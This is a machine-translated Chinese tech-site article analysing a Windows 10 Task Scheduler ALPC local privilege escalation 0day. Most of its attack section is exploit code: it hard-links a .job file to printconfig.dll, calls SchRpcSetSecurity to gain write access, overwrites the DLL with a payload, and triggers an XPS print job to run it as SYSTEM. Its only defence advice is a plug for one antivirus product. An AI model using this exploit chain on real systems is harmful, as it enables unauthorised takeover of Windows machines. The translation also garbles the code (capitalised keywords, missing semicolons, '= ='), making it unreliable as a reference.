Shulou(Shulou.com)06/01 Report--

This article analyzes with you "win10 local rights raising 0day early warning case analysis". The content is detailed and easy to understand. Friends who are interested in the "0day early warning case Analysis of win10 Local Rights Promotion" can follow the editor's train of thought to read it slowly and deeply. I hope it will be helpful to everyone after reading. Let's follow the editor to learn the knowledge of "0day early warning case Analysis of win10 Local Rights Promotion".

0x00 vulnerability background

The function exported by the task scheduling service in win10 does not verify the permissions of the caller. Users with arbitrary permissions can call this function to obtain write permissions for sensitive files of the system, and then enhance the rights.

Impact of 0x01 vulnerabilities

The vulnerability affects win10 and windows server 2016. Currently released EXP can only be used on x64 systems for the time being.

0x02 vulnerability details

The ALPC call interface in the Task Scheduler task scheduling service of the win10 system exports the SchRpcSetSecurity function, which can set a security descriptor on a task or folder.

HRESULT SchRpcSetSecurity (

[in, string] const wchar_t* path

[in, string] const wchar_t* sddl

[in] DWORD flags

);

The service is started through svchost's service group netsvcs, and the corresponding dll is schedsvc.dll.

On xp systems, tasks are stored in the C:\ Windows\ Tasks directory with the suffix .job, while win7 and later versions of tasks are stored in the C:\ Windows\ System32\ Tasks directory in xml format.

Perhaps for compatibility reasons, the SchRpcSetSecurity function still detects the existence of a file with the suffix .job in the C:\ Windows\ Tasks directory in win10, and if so, writes DACL data. If the job file is hard-linked to a specific dll, then the specific dll will be written to the DACL data. Originally, ordinary users only have read access to the specific dll, so they have write access, and then write exploit code to the dll and start the corresponding program to obtain the rights.

First of all, you need to find a dll,EXP in which an ordinary user has read permission and the system has write DACL permission to use C:\ Windows\ System32\ DriverStore\ FileRepository\ prnms003.inf_amd64_4592475aca2acf83\ Amd64\ printconfig.dll, and then hard link C:\ Windows\ Tasks\ UpdateTask.job to this dll.

WIN32_FIND_DATA FindFileData

HANDLE hFind

HFind = FindFirstFile (L "C:\\ Windows\\ System32\\ DriverStore\ FileRepository\\ prnms003.inf_amd64*", & FindFileData)

Wchar_t BeginPath [Max _ PATH] = L "c:\\ windows\\ system32\\ DriverStore\\ FileRepository\\"

Wchar_t PrinterDriverFolder[MAX _ PATH]

Wchar_t EndPath [23] = L "\\ Amd64\\ PrintConfig.dll"

Wmemcpy (PrinterDriverFolder, FindFileData.cFileName, wcslen (FindFileData.cFileName))

FindClose (hFind)

Wcscat (BeginPath, PrinterDriverFolder)

Wcscat (BeginPath, EndPath)

/ / Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of

CreateNativeHardlink (L "c:\ windows\\ tasks\\ UpdateTask.job", BeginPath)

Write to the exploit.dll in the resource file after calling the SchRpcSetSecurity function so that the normal user has successfully obtained the permission to write to the dll.

/ / Must be name of final DLL.. Might be better ways to grab the handle

HMODULE mod = GetModuleHandle (L "ALPC-TaskSched-LPE")

/ / Payload is included as a resource, you need to modify this resource accordingly.

HRSRC myResource =:: FindResource (mod, MAKEINTRESOURCE (IDR_RCDATA1), RT_RCDATA)

Unsigned int myResourceSize =:: SizeofResource (mod, myResource)

HGLOBAL myResourceData =:: LoadResource (mod, myResource)

Void* pMyBinaryData =:: LockResource (myResourceData)

/ / We try to open the DLL in a loop, it could already be loaded somewhere.. If thats the case, it will throw a sharing violation and we should not continue

HANDLE hFile

DWORD dwBytesWritten = 0

Do {

HFile = CreateFile (BeginPath,GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL)

WriteFile (hFile, (char*) pMyBinaryData,myResourceSize,&dwBytesWritten,NULL)

If (hFile = = INVALID_HANDLE_VALUE)

{

Sleep (5000)

}

} while (hFile = = INVALID_HANDLE_VALUE)

CloseHandle (hFile)

Printconfig.dll is related to system printing and is not started by the print spooler service by default. So then call StartXpsPrintJob to start a XPS print.

/ / After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service.

CoInitialize (nullptr)

IXpsOMObjectFactory * xpsFactory = NULL

CoCreateInstance (_ _ uuidof (XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, _ _ uuidof (IXpsOMObjectFactory), reinterpret_cast (& xpsFactory))

HANDLE completionEvent = CreateEvent (NULL, TRUE, FALSE, NULL)

IXpsPrintJob * job = NULL

IXpsPrintJobStream * jobStream = NULL

StartXpsPrintJob (L "Microsoft XPS Document Writer", L "PrintJob 1", NULL, NULL, completionEvent, NULL, 0, & job, & jobStream, NULL)

JobStream- > Close ()

CoUninitialize ()

Return 0

The whole exploit program is compiled into a dll, which is injected into notepad to run, and it is found that the notepad created by spoolsv.exe already has SYSTEM permissions, and the printconfig.dll in the system has also been modified to exploit.dll in the resource file.

0x03 defense measures

It is recommended that users install terminal defense software such as 360 security guards to intercept attacks that exploit such vulnerabilities and do not open programs from unknown sources.

On the win10 local rights 0day early warning example analysis to share here, I hope that the above content can make you improve. If you want to learn more knowledge, please pay more attention to the editor's updates. Thank you for following the website!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.